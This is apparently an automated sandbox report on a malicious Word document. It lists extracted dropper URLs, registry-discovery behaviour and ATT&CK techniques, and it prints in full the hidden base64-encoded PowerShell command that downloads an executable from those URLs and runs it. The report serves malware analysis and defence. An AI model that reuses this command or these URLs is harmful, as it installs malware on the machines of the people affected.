b61b475fa2096b7f9600bd38188bca553fa3f665df25b11fb4159322c5e0b00e

General

Target

b61b475fa2096b7f9600bd38188bca553fa3f665df25b11fb4159322c5e0b00e.doc
Sample

200127-64rv42e5hn
SHA256

b61b475fa2096b7f9600bd38188bca553fa3f665df25b11fb4159322c5e0b00e

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://camnangtrithuc.com/wp-admin/rysO51/

exe.dropper

http://srgasia.com.my/wp-content/vmcG8715/

exe.dropper

https://www.amedspor.com.tr/trsss/2aCO1Gkwg/

exe.dropper

https://uklid.ir/cgi-bin/8v/

exe.dropper

https://bffanmiefan.tk/cgi-bin/wYvv84846/

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

5032 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

5032 WINWORD.EXE

pid	process
5032	WINWORD.EXE

pid	process
5032	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4680	3048	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 4680 Powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

4680 Powershell.exe

description	pid	process
Token: SeDebugPrivilege	4680	Powershell.exe

pid	process
4680	Powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b61b475fa2096b7f9600bd38188bca553fa3f665df25b11fb4159322c5e0b00e.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Checks processor information in registry
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABPAG4AbQB6AGMAeQB2AGoAZQBvAG8APQAnAFMAegBmAHMAcQBxAGYAcQB1AHUAZQBrAHMAJwA7ACQARwBtAHcAagBiAGwAcwBrAGoAbwB5ACAAPQAgACcANQA1ADQAJwA7ACQATgBmAHoAdgBpAG8AZgBsAD0AJwBVAHQAZwBiAHkAaABpAGMAdAB0ACcAOwAkAFgAdAB5AHIAdwBkAHMAeABvAG0AcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBtAHcAagBiAGwAcwBrAGoAbwB5ACsAJwAuAGUAeABlACcAOwAkAFgAaQBxAHkAdAB0AGkAbwBrAGoAZwA9ACcASQBwAGUAcgBkAHUAdABjAGcAdwBsACcAOwAkAEoAYgB4AGgAawBuAHIAcQBoAHAAdgBwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBCAEMAbABpAGUATgBUADsAJABTAHcAeQBjAHgAYgBoAG4AcwB2AD0AJwBoAHQAdABwADoALwAvAGMAYQBtAG4AYQBuAGcAdAByAGkAdABoAHUAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcgB5AHMATwA1ADEALwAqAGgAdAB0AHAAOgAvAC8AcwByAGcAYQBzAGkAYQAuAGMAbwBtAC4AbQB5AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYAbQBjAEcAOAA3ADEANQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBtAGUAZABzAHAAbwByAC4AYwBvAG0ALgB0AHIALwB0AHIAcwBzAHMALwAyAGEAQwBPADEARwBrAHcAZwAvACoAaAB0AHQAcABzADoALwAvAHUAawBsAGkAZAAuAGkAcgAvAGMAZwBpAC0AYgBpAG4ALwA4AHYALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGYAZgBhAG4AbQBpAGUAZgBhAG4ALgB0AGsALwBjAGcAaQAtAGIAaQBuAC8AdwBZAHYAdgA4ADQAOAA0ADYALwAnAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFYAdwBiAHEAdgB2AHcAdwBoAHIAZQBqAD0AJwBEAGIAegBrAG4AegBrAHAAcwBkACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAGgAYwBpAHUAZwBiAGcAYQB0AHQAYQAgAGkAbgAgACQAUwB3AHkAYwB4AGIAaABuAHMAdgApAHsAdAByAHkAewAkAEoAYgB4AGgAawBuAHIAcQBoAHAAdgBwAC4AIgBkAE8AVwBuAGAATABgAG8AYQBkAGYASQBMAEUAIgAoACQAQwBoAGMAaQB1AGcAYgBnAGEAdAB0AGEALAAgACQAWAB0AHkAcgB3AGQAcwB4AG8AbQBzACkAOwAkAFoAbQBvAHIAbABmAG8AYQB4AG0AbQA9ACcASwBrAHUAYgB4AGEAaABpAGgAcQBiACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAWAB0AHkAcgB3AGQAcwB4AG8AbQBzACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgA1ADAANQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFgAdAB5AHIAdwBkAHMAeABvAG0AcwApADsAJABLAGkAZgBkAHgAZgBmAHcAawBpAHEAZgB6AD0AJwBPAHIAbwBnAHYAYwBvAHAAbwB2AGQAZAAnADsAYgByAGUAYQBrADsAJABXAG4AawB6AGgAZQBzAHIAaQBvAG8APQAnAEEAbQBrAHMAYQBtAG8AdAB5AG0AYQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABWAHMAcgBoAHUAYgB5AGYAbwB2AGYAZgA9ACcAQgB3AGkAegBzAG0AbwBvAGQAZQBkACcA
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads